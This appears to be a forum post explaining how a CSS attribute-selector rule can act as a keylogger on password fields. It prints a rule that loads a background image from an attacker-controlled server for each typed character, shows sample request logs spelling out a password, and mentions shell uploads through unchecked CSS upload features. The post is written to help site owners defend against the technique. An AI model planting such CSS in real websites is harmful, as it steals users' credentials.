At the point when the input field's text changes, the CSS rule utilizes the value of the input to define the CSS. In this case, a background image is loaded. You can investigate different selectors ( https://www.w3schools.com/css/css_attrib...ectors.asp ), yet the weakness is straightforward. If an attacker is able to load a CSS file on your server whether it's included in an src, a local file, or inline, then they can technically listen to your login form and use the CSS as a keylogger.

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");

This sends a request to a third-party server (with /a in url) every time the string in the password field ends in a. If you set this up for every single letter, number, symbol, then every time a user types in a character to the password box, it will trigger a request. On the hacker's server, all they need to do is review the logs to see requests like this:

request to: /p
request to: /a
request to: /s
request to: /s
request to: /w
request to: /o
request to: /r
request to: /d
request to: /s

They can set up another route for the username/email field so that they can compare the times of the requests to match user logins and steal your info.

As published here in 2018:

This method was actually something that affected popular forum softwares, but also other web software's that allow CSS stylesheet uploads for theme settings. In the admin UI, certain user roles could be given permission to modify the design templates or even upload CSS files. All the attacker had to do was gain enough trust to become staff on the forum to access these tools. I vaguely remember at one point there being a specific forum software that didn't even check filetypes on the CSS upload, so you could use it to upload a shell. However, even a normal CSS file can be used maliciously.

People don't think about CSS as something that could be dangerous, but I hope now that people realize that's not true.

Hope this helps you protect your websites.